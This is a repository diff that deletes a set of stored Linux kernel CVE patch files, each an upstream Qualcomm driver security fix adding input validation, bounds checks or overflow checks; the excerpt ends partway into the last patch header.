@@ -1,170 +0,0 @@ -From b5112838eb91b71eded4b5ee37338535784e0aef Mon Sep 17 00:00:00 2001 -From: Srinivas Girigowda -Date: Sun, 10 Apr 2016 00:03:18 -0700 -Subject: qcacld-2.0: Add input validation for SENDACTIONFRAME - -Add input validation for SENDACTIONFRAME driver command. - -Change-Id: I3d1bf424e5e0f9a3b6f4662dd12a3a7314c7eace -CRs-Fixed: 1001449 ---- - CORE/HDD/src/wlan_hdd_main.c | 97 +++++++++++++++++++++++++++----------------- - 1 file changed, 59 insertions(+), 38 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c -index a647bb5..8b7a441 100644 ---- a/CORE/HDD/src/wlan_hdd_main.c -+++ b/CORE/HDD/src/wlan_hdd_main.c -@@ -2205,16 +2205,15 @@ hdd_parse_send_action_frame_v1_data(const tANI_U8 *pValue, - static int - hdd_sendactionframe(hdd_adapter_t *pAdapter, const tANI_U8 *bssid, - const tANI_U8 channel, const tANI_U8 dwell_time, -- const tANI_U8 payload_len, const tANI_U8 *payload) -+ const int payload_len, const tANI_U8 *payload) - { - struct ieee80211_channel chan; -- tANI_U8 frame_len; -+ int frame_len, ret = 0; - tANI_U8 *frame; - struct ieee80211_hdr_3addr *hdr; - u64 cookie; - hdd_station_ctx_t *pHddStaCtx; - hdd_context_t *pHddCtx; -- int ret = 0; - tpSirMacVendorSpecificFrameHdr pVendorSpecific = - (tpSirMacVendorSpecificFrameHdr) payload; - #if (LINUX_VERSION_CODE >= KERNEL_VERSION(3,14,0)) || defined(WITH_BACKPORTS) -@@ -2371,45 +2370,57 @@ hdd_parse_sendactionframe_v1(hdd_adapter_t *pAdapter, const char *command) - return ret; - } - --/* -- \brief hdd_parse_sendactionframe_v2() - parse version 2 of the -- SENDACTIONFRAME command -- -- This function parses the v2 SENDACTIONFRAME command with the format -+/** -+ * hdd_parse_sendactionframe_v2() - parse version 2 of the -+ * SENDACTIONFRAME command -+ * @pAdapter: Adapter upon which the command was received -+ * @command: command that was received, ASCII command followed -+ * by binary data -+ * @total_len: total length of command -+ * -+ * This function parses 
the v2 SENDACTIONFRAME command with the format -+ * SENDACTIONFRAME -+ * -+ * Return: 0 for success non-zero for failure -+ */ -+static int -+hdd_parse_sendactionframe_v2(hdd_adapter_t *pAdapter, -+ const char *command, int total_len) -+{ -+ struct android_wifi_af_params *params; -+ tSirMacAddr bssid; -+ int ret; - -- SENDACTIONFRAME -+ /* The params are located after "SENDACTIONFRAME " */ -+ total_len -= 16; -+ params = (struct android_wifi_af_params *)(command + 16); - -- \param - pAdapter - Adapter upon which the command was received -- \param - command - command that was received, ASCII command followed -- by binary data -+ if (params->len <= 0 || params->len > ANDROID_WIFI_ACTION_FRAME_SIZE || -+ (params->len > total_len)) { -+ hddLog(LOGE, FL("Invalid payload length: %d"), params->len); -+ return -EINVAL; -+ } - -- \return - 0 for success non-zero for failure -+ if (!mac_pton(params->bssid, (u8 *)&bssid)) { -+ hddLog(LOGE, FL("MAC address parsing failed")); -+ return -EINVAL; -+ } - -- --------------------------------------------------------------------------*/ --static int --hdd_parse_sendactionframe_v2(hdd_adapter_t *pAdapter, -- const char *command) --{ -- struct android_wifi_af_params *params; -- tSirMacAddr bssid; -- int ret; -+ if (params->channel < 0 || -+ params->channel > WNI_CFG_CURRENT_CHANNEL_STAMAX) { -+ hddLog(LOGE, FL("Invalid channel: %d"), params->channel); -+ return -EINVAL; -+ } - -- /* params are large so keep off the stack */ -- params = kmalloc(sizeof(*params), GFP_KERNEL); -- if (!params) return -ENOMEM; -+ if (params->dwell_time < 0) { -+ hddLog(LOGE, FL("Invalid dwell_time: %d"), params->dwell_time); -+ return -EINVAL; -+ } - -- /* The params are located after "SENDACTIONFRAME " */ -- memcpy(params, command + 16, sizeof(*params)); -+ ret = hdd_sendactionframe(pAdapter, bssid, params->channel, -+ params->dwell_time, params->len, params->data); - -- if (!mac_pton(params->bssid, (u8 *)&bssid)) { -- hddLog(LOGE, "%s: MAC address parsing 
failed", __func__); -- ret = -EINVAL; -- } else { -- ret = hdd_sendactionframe(pAdapter, bssid, params->channel, -- params->dwell_time, params->len, params->data); -- } -- kfree(params); -- return ret; -+ return ret; - } - - /* -@@ -2429,7 +2440,8 @@ hdd_parse_sendactionframe_v2(hdd_adapter_t *pAdapter, - - --------------------------------------------------------------------------*/ - static int --hdd_parse_sendactionframe(hdd_adapter_t *pAdapter, const char *command) -+hdd_parse_sendactionframe(hdd_adapter_t *pAdapter, const char *command, -+ int total_len) - { - int ret; - -@@ -2445,11 +2457,19 @@ hdd_parse_sendactionframe(hdd_adapter_t *pAdapter, const char *command) - * SENDACTIONFRAME xx:xx:xx:xx:xx:xx* - * 111111111122222222223333 - * 0123456789012345678901234567890123 -+ * -+ * For both the commands, a valid command must have atleast first 34 length -+ * of data. - */ -+ if (total_len < 34) { -+ hddLog(LOGE, FL("Invalid command (total_len=%d)"), total_len); -+ return -EINVAL; -+ } -+ - if (command[33]) { - ret = hdd_parse_sendactionframe_v1(pAdapter, command); - } else { -- ret = hdd_parse_sendactionframe_v2(pAdapter, command); -+ ret = hdd_parse_sendactionframe_v2(pAdapter, command, total_len); - } - - return ret; -@@ -5851,7 +5871,8 @@ static int hdd_driver_command(hdd_adapter_t *pAdapter, - } - else if (strncmp(command, "SENDACTIONFRAME", 15) == 0) - { -- ret = hdd_parse_sendactionframe(pAdapter, command); -+ ret = hdd_parse_sendactionframe(pAdapter, command, -+ priv_data.total_len); - } - else if (strncmp(command, "GETROAMSCANCHANNELMINTIME", 25) == 0) - { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3906/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3906/ANY/0001.patch deleted file mode 100644 index 6b7ddda6..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3906/ANY/0001.patch +++ /dev/null 
@@ -1,143 +0,0 @@ -From b333d32745fec4fb1098ee1a03d4425f3c1b4c2e Mon Sep 17 00:00:00 2001 -From: Archana Sathyakumar -Date: Mon, 22 Aug 2016 15:20:02 -0600 -Subject: msm-core: debug: Update the number of supported pstates. - -Update the number of power-freq pair value supported in the debug -interface. Parse the arguments as uint32_t instead of uint64_t which -might cause memory corruption. - -CRs-fixed: 1054344 -Change-Id: I30492b79b96356177cdcc72e4e2ee656317de500 -Signed-off-by: Archana Sathyakumar ---- - drivers/power/qcom/debug_core.c | 51 +++++++++++++++++++++++++---------------- - 1 file changed, 31 insertions(+), 20 deletions(-) - -diff --git a/drivers/power/qcom/debug_core.c b/drivers/power/qcom/debug_core.c -index e9c578f..ccef04a 100644 ---- a/drivers/power/qcom/debug_core.c -+++ b/drivers/power/qcom/debug_core.c -@@ -84,15 +84,28 @@ static struct debugfs_blob_wrapper help_msg = { - - }; - --static void add_to_ptable(uint64_t *arg) -+static void add_to_ptable(unsigned int *arg) - { - struct core_debug *node; - int i, cpu = arg[CPU_OFFSET]; -+ uint32_t freq = arg[FREQ_OFFSET]; -+ uint32_t power = arg[POWER_OFFSET]; - - if (!cpu_possible(cpu)) - return; - -+ if ((freq == 0) || (power == 0)) { -+ pr_warn("Incorrect power data\n"); -+ return; -+ } -+ - node = &per_cpu(c_dgfs, cpu); -+ -+ if (node->len >= MAX_PSTATES) { -+ pr_warn("Dropped ptable update - no space left.\n"); -+ return; -+ } -+ - if (!node->head) { - node->head = kzalloc(sizeof(struct cpu_pstate_pwr) * - (MAX_PSTATES + 1), -@@ -100,24 +113,18 @@ static void add_to_ptable(uint64_t *arg) - if (!node->head) - return; - } -- for (i = 0; i < MAX_PSTATES; i++) { -- if (node->head[i].freq == arg[FREQ_OFFSET]) { -- node->head[i].power = arg[POWER_OFFSET]; -+ -+ for (i = 0; i < node->len; i++) { -+ if (node->head[i].freq == freq) { -+ node->head[i].power = power; - return; - } -- if (node->head[i].freq == 0) -- break; -- } -- -- if (i == MAX_PSTATES) { -- pr_warn("Dropped ptable update - no space 
left.\n"); -- return; - } - - /* Insert a new frequency (may need to move things around to - keep in ascending order). */ - for (i = MAX_PSTATES - 1; i > 0; i--) { -- if (node->head[i-1].freq > arg[FREQ_OFFSET]) { -+ if (node->head[i-1].freq > freq) { - node->head[i].freq = node->head[i-1].freq; - node->head[i].power = node->head[i-1].power; - } else if (node->head[i-1].freq != 0) { -@@ -125,15 +132,17 @@ static void add_to_ptable(uint64_t *arg) - } - } - -- node->head[i].freq = arg[FREQ_OFFSET]; -- node->head[i].power = arg[POWER_OFFSET]; -- node->len++; -+ if (node->len < MAX_PSTATES) { -+ node->head[i].freq = freq; -+ node->head[i].power = power; -+ node->len++; -+ } - - if (node->ptr) - node->ptr->len = node->len; - } - --static int split_ptable_args(char *line, uint64_t *arg, uint32_t n) -+static int split_ptable_args(char *line, unsigned int *arg, uint32_t n) - { - char *args; - int i; -@@ -143,7 +152,9 @@ static int split_ptable_args(char *line, uint64_t *arg, uint32_t n) - if (!line) - break; - args = strsep(&line, " "); -- ret = kstrtoull(args, 10, &arg[i]); -+ ret = kstrtouint(args, 10, &arg[i]); -+ if (ret) -+ return ret; - } - return ret; - } -@@ -153,7 +164,7 @@ static ssize_t msm_core_ptable_write(struct file *file, - { - char *kbuf; - int ret; -- uint64_t arg[3]; -+ unsigned int arg[3]; - - if (len == 0) - return 0; -@@ -205,7 +216,7 @@ static int msm_core_ptable_read(struct seq_file *m, void *data) - seq_printf(m, "--- CPU%d - Live numbers at %ldC---\n", - cpu, node->ptr->temp); - print_table(m, msm_core_data[cpu].ptable, -- msm_core_data[cpu].len); -+ node->driver_len); - } - } - return 0; -@@ -216,7 +227,7 @@ static ssize_t msm_core_enable_write(struct file *file, - { - char *kbuf; - int ret; -- uint64_t arg[3]; -+ unsigned int arg[3]; - int cpu; - - if (len == 0) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3907/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-3907/3.10/0002.patch deleted file mode 100644 index f57f2f22..00000000 
--- a/Patches/Linux_CVEs/CVE-2016-3907/3.10/0002.patch +++ /dev/null @@ -1,33 +0,0 @@ -From 289ede9d6bfb46178326ae9ca86033bbd452f269 Mon Sep 17 00:00:00 2001 -From: Siena Richard -Date: Tue, 16 Aug 2016 13:03:56 -0700 -Subject: misc: qcom: qdsp6v2: initialize wma_config_32 - -Not all memebers of wma_config_32 are set before they are used which -might lead to invalid values being passed and used. To fix this issue -initialize all member variables of struct wma_config_32 to 0 before -assigning specific values individually. - -Change-Id: Ibb082ce691625527e9a9ffd4978dea7ba4df9e84 -CRs-Fixed: 1054352 -Signed-off-by: Siena Richard ---- - drivers/misc/qcom/qdsp6v2/audio_wma.c | 2 ++ - 1 file changed, 2 insertions(+) - -diff --git a/drivers/misc/qcom/qdsp6v2/audio_wma.c b/drivers/misc/qcom/qdsp6v2/audio_wma.c -index 3d57d38d..4389c0f 100644 ---- a/drivers/misc/qcom/qdsp6v2/audio_wma.c -+++ b/drivers/misc/qcom/qdsp6v2/audio_wma.c -@@ -166,6 +166,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd, - struct msm_audio_wma_config_v2 *wma_config; - struct msm_audio_wma_config_v2_32 wma_config_32; - -+ memset(&wma_config_32, 0, sizeof(wma_config_32)); -+ - wma_config = (struct msm_audio_wma_config_v2 *)audio->codec_cfg; - wma_config_32.format_tag = wma_config->format_tag; - wma_config_32.numchannels = wma_config->numchannels; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3907/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-3907/3.18/0001.patch deleted file mode 100644 index 3dab7180..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3907/3.18/0001.patch +++ /dev/null 
@@ -1,33 +0,0 @@
-From 744330f4e5d70dce71c4c9e03c5b6a8b59bb0cda Mon Sep 17 00:00:00 2001
-From: Siena Richard
-Date: Tue, 16 Aug 2016 13:03:56 -0700
-Subject: misc: qcom: qdsp6v2: initialize wma_config_32
-
-Not all memebers of wma_config_32 are set before they are used which
-might lead to invalid values being passed and used. To fix this issue
-initialize all member variables of struct wma_config_32 to 0 before
-assigning specific values individually.
-
-Change-Id: Ibb082ce691625527e9a9ffd4978dea7ba4df9e84
-CRs-Fixed: 1054352
-Signed-off-by: Siena Richard
----
- drivers/misc/qcom/qdsp6v2/audio_wma.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_wma.c b/drivers/misc/qcom/qdsp6v2/audio_wma.c
-index 9877937..cb5a9b1 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_wma.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_wma.c
-@@ -162,6 +162,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_wma_config_v2 *wma_config;
- struct msm_audio_wma_config_v2_32 wma_config_32;
-
-+ memset(&wma_config_32, 0, sizeof(wma_config_32));
-+
- wma_config = (struct msm_audio_wma_config_v2 *)audio->codec_cfg;
- wma_config_32.format_tag = wma_config->format_tag;
- wma_config_32.numchannels = wma_config->numchannels;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3931/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3931/ANY/0001.patch
deleted file mode 100644
index 054d871e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3931/ANY/0001.patch
+++ /dev/null
@@ -1,134 +0,0 @@
-From e80b88323f9ff0bb0e545f209eec08ec56fca816 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Mon, 18 Jul 2016 13:20:18 -0700
-Subject: qseecom: validate the inputs of __qseecom_send_modfd_resp
-
-The resp_len and resp_buf_ptr of qseecom_send_modfd_listener_resp
-are not checked, then an userspace application that manipulates
-resp_len can corrupt the kernel memory. Thus make changes to
-validate these parameters.
-
-CRs-fixed: 1036418
-Change-Id: Id43ec6b55b332d0dac09a9abb998a410f49b44f7
-Signed-off-by: Zhen Kong
----
- drivers/misc/qseecom.c | 78 +++++++++++++++++++++++++++++++++++++++----------
- 1 file changed, 61 insertions(+), 17 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index b175965c..1168181 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -3065,41 +3065,80 @@ static int qseecom_send_resp(void)
- }
-
-
--static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
-- void __user *argp)
-+static int __validate_send_modfd_resp_inputs(struct qseecom_dev_handle *data,
-+ struct qseecom_send_modfd_listener_resp *resp,
-+ struct qseecom_registered_listener_list *this_lstnr)
- {
-- struct qseecom_send_modfd_listener_resp resp;
- int i;
-- struct qseecom_registered_listener_list *this_lstnr = NULL;
-
-- if (copy_from_user(&resp, argp, sizeof(resp))) {
-- pr_err("copy_from_user failed");
-+ if (!data || !resp || !this_lstnr) {
-+ pr_err("listener handle or resp msg is null\n");
- return -EINVAL;
- }
-- this_lstnr = __qseecom_find_svc(data->listener.id);
-- if (this_lstnr == NULL)
-+
-+ if (resp->resp_buf_ptr == NULL) {
-+ pr_err("resp buffer is null\n");
-+ return -EINVAL;
-+ }
-+ /* validate resp buf length */
-+ if ((resp->resp_len == 0) ||
-+ (resp->resp_len > this_lstnr->sb_length)) {
-+ pr_err("resp buf length %d not valid\n", resp->resp_len);
- return -EINVAL;
-+ }
-
-- if (resp.resp_buf_ptr == NULL) {
-- pr_err("Invalid resp_buf_ptr\n");
-+ if ((uintptr_t)resp->resp_buf_ptr
> (ULONG_MAX - resp->resp_len)) {
-+ pr_err("Integer overflow in resp_len & resp_buf\n");
-+ return -EINVAL;
-+ }
-+ if ((uintptr_t)this_lstnr->user_virt_sb_base >
-+ (ULONG_MAX - this_lstnr->sb_length)) {
-+ pr_err("Integer overflow in user_virt_sb_base & sb_length\n");
- return -EINVAL;
- }
-+ /* validate resp buf */
-+ if (((uintptr_t)resp->resp_buf_ptr <
-+ (uintptr_t)this_lstnr->user_virt_sb_base) ||
-+ ((uintptr_t)resp->resp_buf_ptr >=
-+ ((uintptr_t)this_lstnr->user_virt_sb_base +
-+ this_lstnr->sb_length)) ||
-+ (((uintptr_t)resp->resp_buf_ptr + resp->resp_len) >
-+ ((uintptr_t)this_lstnr->user_virt_sb_base +
-+ this_lstnr->sb_length))) {
-+ pr_err("resp buf is out of shared buffer region\n");
-+ return -EINVAL;
-+ }
-+
- /* validate offsets */
- for (i = 0; i < MAX_ION_FD; i++) {
-- if (resp.ifd_data[i].cmd_buf_offset >= resp.resp_len) {
-+ if (resp->ifd_data[i].cmd_buf_offset >= resp->resp_len) {
- pr_err("Invalid offset %d = 0x%x\n",
-- i, resp.ifd_data[i].cmd_buf_offset);
-+ i, resp->ifd_data[i].cmd_buf_offset);
- return -EINVAL;
- }
- }
-
-- if ((resp.resp_buf_ptr < this_lstnr->user_virt_sb_base) ||
-- ((uintptr_t)resp.resp_buf_ptr >=
-- ((uintptr_t)this_lstnr->user_virt_sb_base +
-- this_lstnr->sb_length))) {
-- pr_err("resp_buf_ptr address not within shared buffer\n");
-+ return 0;
-+}
-+
-+static int __qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
-+ void __user *argp, bool is_64bit_addr)
-+{
-+ struct qseecom_send_modfd_listener_resp resp;
-+ struct qseecom_registered_listener_list *this_lstnr = NULL;
-+
-+ if (copy_from_user(&resp, argp, sizeof(resp))) {
-+ pr_err("copy_from_user failed");
- return -EINVAL;
- }
-+
-+ this_lstnr = __qseecom_find_svc(data->listener.id);
-+ if (this_lstnr == NULL)
-+ return -EINVAL;
-+
-+ if (__validate_send_modfd_resp_inputs(data, &resp, this_lstnr))
-+ return -EINVAL;
-+
- resp.resp_buf_ptr = this_lstnr->sb_virt +
- (uintptr_t)(resp.resp_buf_ptr - this_lstnr->user_virt_sb_base);
-
__qseecom_update_cmd_buf(&resp, false, data, true);
-@@ -3108,6 +3147,11 @@ static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
- return 0;
- }
-
-+static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
-+ void __user *argp)
-+{
-+ return __qseecom_send_modfd_resp(data, argp, false);
-+}
-
- static int qseecom_get_qseos_version(struct qseecom_dev_handle *data,
- void __user *argp)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3934/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3934/ANY/0001.patch
deleted file mode 100644
index a0cdb855..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3934/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 27fbeb6b025d5d46ccb0497cbed4c6e78ed1c5cc Mon Sep 17 00:00:00 2001
-From: Vasko Kalanoski
-Date: Tue, 3 Feb 2015 13:17:44 +0200
-Subject: msm: camera: restructure data handling to be more robust
-
-add dynamic array allocation instead of static to prevent
-stack overflow.
-
-Change-Id: Id12ed5b01809021d2b1d1d71436f2523b575d9de
-Signed-off-by: Vasko Kalanoski
----
- .../msm/camera_v2/sensor/io/msm_camera_cci_i2c.c | 25 +++++++++++++++-------
- 1 file changed, 17 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 4b0bde95..59ad29f 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -138,23 +138,30 @@ int32_t msm_camera_cci_i2c_write_seq(struct msm_camera_i2c_client *client,
- int32_t rc = -EFAULT;
- uint8_t i = 0;
- struct msm_camera_cci_ctrl cci_ctrl;
-- struct msm_camera_i2c_reg_array reg_conf_tbl[num_byte];
-+ struct msm_camera_i2c_reg_array *reg_conf_tbl = NULL;
-
- if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
- && client->addr_type != MSM_CAMERA_I2C_WORD_ADDR)
- || num_byte == 0)
- return rc;
-
-- S_I2C_DBG("%s reg addr = 0x%x num bytes: %d\n",
-- __func__, addr, num_byte);
-- memset(reg_conf_tbl, 0,
-- num_byte * sizeof(struct msm_camera_i2c_reg_array));
-- reg_conf_tbl[0].reg_addr = addr;
- if (num_byte > I2C_SEQ_REG_DATA_MAX) {
- pr_err("%s: num_byte=%d clamped to max supported %d\n",
- __func__, num_byte, I2C_SEQ_REG_DATA_MAX);
-- num_byte = I2C_SEQ_REG_DATA_MAX;
-+ return rc;
- }
-+
-+ S_I2C_DBG("%s reg addr = 0x%x num bytes: %d\n",
-+ __func__, addr, num_byte);
-+
-+ reg_conf_tbl = kzalloc(num_byte *
-+ (sizeof(struct msm_camera_i2c_reg_array)), GFP_KERNEL);
-+ if (!reg_conf_tbl) {
-+ pr_err("%s:%d no memory\n", __func__, __LINE__);
-+ return -ENOMEM;
-+ }
-+
-+ reg_conf_tbl[0].reg_addr = addr;
- for (i = 0; i < num_byte; i++) {
- reg_conf_tbl[i].reg_data = data[i];
- reg_conf_tbl[i].delay = 0;
-@@ -169,6 +176,8 @@ int32_t msm_camera_cci_i2c_write_seq(struct msm_camera_i2c_client *client,
- core, ioctl, VIDIOC_MSM_CCI_CFG, &cci_ctrl);
- CDBG("%s line %d rc = %d\n", __func__, __LINE__, rc);
- rc = cci_ctrl.status;
-+ kfree(reg_conf_tbl);
-+ reg_conf_tbl = NULL;
- return rc;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3935/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3935/ANY/0001.patch
deleted file mode 100644
index 4b807753..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3935/ANY/0001.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 5f69ccf3b011c1d14a1b1b00dbaacf74307c9132 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Fri, 29 Jul 2016 15:32:31 -0700
-Subject: msm: crypto: Fix integer over flow check in qcedev driver
-
-Integer overflow check always fails when ULONG_MAX is used,
-as ULONG_MAX is 2^64-1, while req->data[i].len and total
-are uint32_t. Make change to use U32_MAX instead of
-ULONG_MAX.
-
-CRs-fixed: 1046507
-Change-Id: Iccf9c32400ecc7ffc0afae16f58c38e5d78a5b64
-Signed-off-by: Zhen Kong
----
- drivers/crypto/msm/qcedev.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index 51f5069..e63f061 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1,6 +1,6 @@
- /* Qualcomm CE device driver.
- *
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1543,7 +1543,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- }
- /* Check for sum of all dst length is equal to data_len */
- for (i = 0; i < req->entries; i++) {
-- if (req->vbuf.dst[i].len >= ULONG_MAX - total) {
-+ if (req->vbuf.dst[i].len >= U32_MAX - total) {
- pr_err("%s: Integer overflow on total req dst vbuf length\n",
- __func__);
- goto error;
-@@ -1557,7 +1557,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- }
- /* Check for sum of all src length is equal to data_len */
- for (i = 0, total = 0; i < req->entries; i++) {
-- if (req->vbuf.src[i].len > ULONG_MAX - total) {
-+ if (req->vbuf.src[i].len > U32_MAX - total) {
- pr_err("%s: Integer overflow on total req src vbuf length\n",
- __func__);
- goto error;
-@@ -1619,7 +1619,7 @@ static int qcedev_check_sha_params(struct qcedev_sha_op_req
*req,
-
- /* Check for sum of all src length is equal to data_len */
- for (i = 0, total = 0; i < req->entries; i++) {
-- if (req->data[i].len > ULONG_MAX - total) {
-+ if (req->data[i].len > U32_MAX - total) {
- pr_err("%s: Integer overflow on total req buf length\n",
- __func__);
- goto sha_error;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3938/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3938/ANY/0001.patch
deleted file mode 100644
index 6b340a02..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3938/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 467c81f9736b1ebc8d4ba70f9221bba02425ca10 Mon Sep 17 00:00:00 2001
-From: Shalini Krishnamoorthi
-Date: Tue, 2 Aug 2016 10:29:00 -0700
-Subject: msm: mdss: Fix to validate data copied from user space
-
-The overlay zorder values copied from user space are used
-as index in left_lm_zo_cnt and right_lm_zo_cnt. This fix
-will validate the overlay zorder value copied from user
-space to not go beyond MDSS_MDP_MAX_STAGE, thus preventing
-any arbitrary increments in kernel memory.
-
-CRs-Fixed: 1049232
-Change-Id: Ie8e65ce9f58cb357204bfa4c6a6e0fccec82d5ba
-Signed-off-by: Shalini Krishnamoorthi
----
- drivers/video/msm/mdss/mdss_mdp_overlay.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_overlay.c b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-index 2024bd4..e8a91cf 100644
---- a/drivers/video/msm/mdss/mdss_mdp_overlay.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-@@ -4070,16 +4070,20 @@ static int __mdss_overlay_src_split_sort(struct msm_fb_data_type *mfd,
- __overlay_swap_func);
-
- for (i = 0; i < num_ovs; i++) {
-+ if (ovs[i].z_order >= MDSS_MDP_MAX_STAGE) {
-+ pr_err("invalid stage:%u\n", ovs[i].z_order);
-+ return -EINVAL;
-+ }
- if (ovs[i].dst_rect.x < left_lm_w) {
- if (left_lm_zo_cnt[ovs[i].z_order] == 2) {
-- pr_err("more than 2 ov @ stage%d on left lm\n",
-+ pr_err("more than 2 ov @ stage%u on left lm\n",
- ovs[i].z_order);
- return -EINVAL;
- }
- left_lm_zo_cnt[ovs[i].z_order]++;
- } else {
- if (right_lm_zo_cnt[ovs[i].z_order] == 2) {
-- pr_err("more than 2 ov @ stage%d on right lm\n",
-+ pr_err("more than 2 ov @ stage%u on right lm\n",
- ovs[i].z_order);
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3939/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3939/ANY/0001.patch
deleted file mode 100644
index b7308472..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3939/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From e0bb18771d6ca71db2c2a61226827059be3fa424 Mon Sep 17 00:00:00 2001
-From: Ping Li
-Date: Fri, 15 Apr 2016 15:27:36 -0700
-Subject: msm: mdss: Correct block id check for mdss_mdp_misr_table
-
-DISPLAY_MISR_LCDC block doesn't have corresponding mdss_mdp_misr_table,
-this change corrects the block id check for mdss_mdp_misr_table.
-
-CRs-Fixed: 1001224
-Change-Id: I74b03c31542d4b239eb2ffdc4dc6345dff5eab86
-Signed-off-by: Ping Li
----
- drivers/video/msm/mdss/mdss_debug.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index e4749c5..e1d4b5f 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -1266,7 +1266,7 @@ static inline struct mdss_mdp_misr_map *mdss_misr_get_map(u32 block_id,
- char *ctrl_reg = NULL, *value_reg = NULL;
- char *intf_base = NULL;
-
-- if (block_id > DISPLAY_MISR_MDP) {
-+ if (block_id > DISPLAY_MISR_HDMI && block_id != DISPLAY_MISR_MDP) {
- pr_err("MISR Block id (%d) out of range\n", block_id);
- return NULL;
- }
-@@ -1408,12 +1408,16 @@ int mdss_misr_set(struct mdss_data_type *mdata,
- bool is_valid_wb_mixer = true;
- bool use_mdp_up_misr = false;
-
-+ if (!mdata || !req || !ctl) {
-+ pr_err("Invalid input params: mdata = %p req = %p ctl = %p",
-+ mdata, req, ctl);
-+ return -EINVAL;
-+ }
- pr_debug("req[block:%d frame:%d op_mode:%d]\n",
- req->block_id, req->frame_count, req->crc_op_mode);
-
- map = mdss_misr_get_map(req->block_id, ctl, mdata,
- ctl->is_video_mode);
--
- if (!map) {
- pr_err("Invalid MISR Block=%d\n", req->block_id);
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3951/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3951/ANY/0001.patch
deleted file mode 100644
index 29b94c50..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3951/ANY/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 4d06dd537f95683aba3651098ae288b7cbff8274 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Bj=C3=B8rn=20Mork?=
-Date: Mon, 7 Mar 2016 21:15:36 +0100
-Subject: cdc_ncm: do not call usbnet_link_change from cdc_ncm_bind
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
